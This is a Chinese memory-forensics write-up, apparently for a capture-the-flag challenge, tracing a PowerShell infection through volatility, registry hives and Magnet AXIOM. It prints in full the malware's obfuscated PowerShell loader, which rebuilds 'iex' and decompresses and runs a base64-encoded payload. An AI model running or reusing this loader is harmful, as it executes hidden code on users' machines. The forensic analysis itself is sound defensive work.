在内存⾥搜 utf16 ⼩端序的字符串的 powershell,发现有这个东⻄

    1. HostApplication=powershell -noprofile & ( $veRBOsepReFErEncE.tOstrINg()
    2. [1,3]+'x'-JOin'')( nEW-ObjEcT sySTEm.iO.sTreaMReAdER( ( nEW-ObjEcT
    3. SystEm.iO.CompreSsiOn.DEfLATEstREam([IO.meMoryStream]
    4. [CoNVeRT]::fROMbASe64StRinG('NVJdb5tAEHyv1P9wQpYAuZDaTpvEVqRi+5Sgmo/Axa0VRdo
    5. LXBMUmyMGu7Es//fuQvoAN7e7Nzua3RqUcJbgQVLIJ1hzNi/eGLMYe2gOFX+0zHpl9s0Uv4YHbnu
    6. 8CzwI8nIW5UX4bNqM2RPGUtU4sPQSH+mmsFbIY87kFit3A6ohVnGIFbLOdLlXCdFhAlOT3rGAEJY
    7. QvfIsgmAjw/mJXTPLssxsg3U59VTvyrT7JjvDS8bwN8NvbPYt81amMeItpi1TI3omaErK0fO5bNr
    8. 7LQVkWjYkqlZtkVtRUK8xxAQxxqylGVwM3dFX6jtw6TgbnrPRCMFlm75i3xAPhq2aqUnNKFyWqhN
    9. iu0bC4wV6kXHDsh6yF5k8Xgz7Hbi6+ACXI/vLQyoSv7x5/EgNbXvy+VPvOAtyvWuggvuGvOhZaNF
    10. S/wTlqN9xwqGuwQddst7Rh3AfvQKHLAoCsq4jmMJBgKrpMbm/By8pcDQLzlju3zFn6S12zB6PjXs
    11. Ifcj0XBmu8Qyqma4ETw2rd8w2MI92IGKU0HGqEGYacp7/Z2U+CB7gqJdy67c2dHYsOA0H598N33b
    12. 3cr3j2EzoKXgpiv1+XjfbIryhRk+wakhq16TSqYhpKcHbpNTox9GYgyekcY0KcFGyKFf56YTF7dr
    13. g1ji/+BMk/G7H04Y599sCFW3+NG71l0aXZRntjFu94FGhHidQzYvOsSiOaLsFxaY6P6CbFWioRSU
    14. TGdSnyT8=' ) , [IO.coMPressION.cOMPresSiOnmOde]::dEcOMPresS)),
    15. [TexT.ENcODInG]::AsCIi)).ReaDToeNd();

    ⽤ volatility 的 dump registry 功能去 dump ⼀下注册表,挂载 hive 到 regedit ⾥⾯,然后搜这个后⾯的命 令,就可以发现相应的键值

    但是我并没有复现成功。。。还有说手翻的,离谱。

    使用MAGNET AXIOM打开,开始分析。
    使用痕迹中查看进程
    image.png
    可以看到cmd是由explorer调用的
    直接查看程序(procdump)可发现
    BlueTeaming - 图2
    同时找到了恶意软件
    image.png
    memdump一下,在内存中找到了恶意代码
    image.png
    注册表项就是

    1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Communication

    但是说实话还是觉得很离谱,数据量太大了,也不能直接靠关键字找,出题人也没给正确做法。。。